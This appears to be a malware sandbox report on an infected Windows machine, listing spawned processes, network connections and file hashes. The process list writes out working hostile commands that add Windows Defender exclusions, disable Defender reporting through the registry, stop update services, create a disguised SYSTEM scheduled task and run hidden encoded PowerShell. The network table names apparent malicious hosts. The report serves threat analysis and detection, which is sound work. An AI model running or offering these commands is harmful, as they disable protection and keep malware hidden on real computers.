"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,14973337550866805478,9103256636975688907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,14973337550866805478,9103256636975688907,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\5464.exe

C:\Users\Admin\AppData\Local\Temp\5464.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe

C:\Users\Admin\AppData\Local\Temp\58CA.exe

C:\Users\Admin\AppData\Local\Temp\58CA.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7B48.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\7CCF.exe

C:\Users\Admin\AppData\Local\Temp\7CCF.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\8A3E.exe

C:\Users\Admin\AppData\Local\Temp\8A3E.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 5376 -ip 5376

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Go001xH.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Go001xH.exe

C:\Users\Admin\AppData\Local\Temp\924D.exe

C:\Users\Admin\AppData\Local\Temp\924D.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 540

C:\Users\Admin\AppData\Local\Temp\9675.exe

C:\Users\Admin\AppData\Local\Temp\9675.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7668 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7668 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7184 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\EF25.exe

C:\Users\Admin\AppData\Local\Temp\EF25.exe

C:\Users\Admin\AppData\Local\Temp\F0BC.exe

C:\Users\Admin\AppData\Local\Temp\F0BC.exe

C:\Users\Admin\AppData\Local\Temp\F282.exe

C:\Users\Admin\AppData\Local\Temp\F282.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\FAEF.exe

C:\Users\Admin\AppData\Local\Temp\FAEF.exe

C:\Users\Admin\AppData\Local\Temp\7zSFBEF.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp" /SL5="$60256,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5744 -ip 5744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 572

C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\3FD9.exe

C:\Users\Admin\AppData\Local\Temp\3FD9.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gaNnjgOTJ" /SC once /ST 01:47:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gaNnjgOTJ"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Network

Country Destination Domain Proto
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 218.25.30.184.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 174.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.150:443 i.ytimg.com tcp
US 8.8.8.8:53 150.179.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
FI 77.91.68.29:80 77.91.68.29 tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 126.179.238.8.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
BG 171.22.28.239:42359 tcp
US 8.8.8.8:53 239.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.34:443 googleads.g.doubleclick.net tcp
NL 142.251.36.34:443 googleads.g.doubleclick.net udp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
US 8.8.8.8:53 34.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 rr5---sn-o097znze.googlevideo.com udp
US 74.125.166.10:443 rr5---sn-o097znze.googlevideo.com tcp
US 74.125.166.10:443 rr5---sn-o097znze.googlevideo.com tcp
FI 77.91.124.71:4341 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
US 8.8.8.8:53 10.166.125.74.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
RU 85.209.11.85:41140 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 74.125.166.10:443 rr5---sn-o097znze.googlevideo.com tcp
US 74.125.166.10:443 rr5---sn-o097znze.googlevideo.com tcp
US 8.8.8.8:53 85.11.209.85.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.96.0:80 stim.graspalace.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 74.125.166.10:443 rr5---sn-o097znze.googlevideo.com tcp
US 74.125.166.10:443 rr5---sn-o097znze.googlevideo.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe

MD5 77e1cdb427a1d084048dbf1e6aa94731
SHA1 984490533f27725a4771feb83bad1e93b19af9c2
SHA256 29771e4dbc98c11f2f7ebac8319afebd6b844816c0a231a44cdb28f4a5e75343
SHA512 164e8e2b8bccdddfdffbb09ad32ec588f9b80ef875473b49aaed4b3574047b5bbf53b71c85cc3833a4528da69ec00b9d180e7d9caadd75d31454019b8b8537b5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe

MD5 77e1cdb427a1d084048dbf1e6aa94731
SHA1 984490533f27725a4771feb83bad1e93b19af9c2
SHA256 29771e4dbc98c11f2f7ebac8319afebd6b844816c0a231a44cdb28f4a5e75343
SHA512 164e8e2b8bccdddfdffbb09ad32ec588f9b80ef875473b49aaed4b3574047b5bbf53b71c85cc3833a4528da69ec00b9d180e7d9caadd75d31454019b8b8537b5

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe

MD5 5e6d5504b56a4301ee63e85d3b0d6232
SHA1 8299feb20875eecce5448a71947d7da770bcf4ee
SHA256 35ef218e21164e5e00ffdaae360c1eea830182814cacda310b83f902a3b2c3f9
SHA512 328f6bd3a095bcb23ae06a17c4c75e8c7418091db2bba6558a300b384271883d6edc3414bcd0e067700564e59739df7c8789b6c477b3c654497281c47acc05b7

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe

MD5 5e6d5504b56a4301ee63e85d3b0d6232
SHA1 8299feb20875eecce5448a71947d7da770bcf4ee
SHA256 35ef218e21164e5e00ffdaae360c1eea830182814cacda310b83f902a3b2c3f9
SHA512 328f6bd3a095bcb23ae06a17c4c75e8c7418091db2bba6558a300b384271883d6edc3414bcd0e067700564e59739df7c8789b6c477b3c654497281c47acc05b7

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe

MD5 8ec178b23d8b9d200181bb1a6c809f17
SHA1 b7169b11740a71f9c87890d48339b89320fd4b54
SHA256 a8462a730ca6d75778061c9d9bf65a484f8efe73f768fdfa0ee011fc354c3df3
SHA512 7cf01077a00bf234aa632aef63f6fbebd525034b0a7a000b145ded6a2ec93eb030d137dab1168d8f46f5ad2077c683f4753e8374cbcad3580361e108ac1104d8

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe

MD5 8ec178b23d8b9d200181bb1a6c809f17
SHA1 b7169b11740a71f9c87890d48339b89320fd4b54
SHA256 a8462a730ca6d75778061c9d9bf65a484f8efe73f768fdfa0ee011fc354c3df3
SHA512 7cf01077a00bf234aa632aef63f6fbebd525034b0a7a000b145ded6a2ec93eb030d137dab1168d8f46f5ad2077c683f4753e8374cbcad3580361e108ac1104d8

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe

MD5 c9c607068fcdfb8907c8d2448db432e3
SHA1 0907ff6818aeddee148788745b1022303f3c7f3c
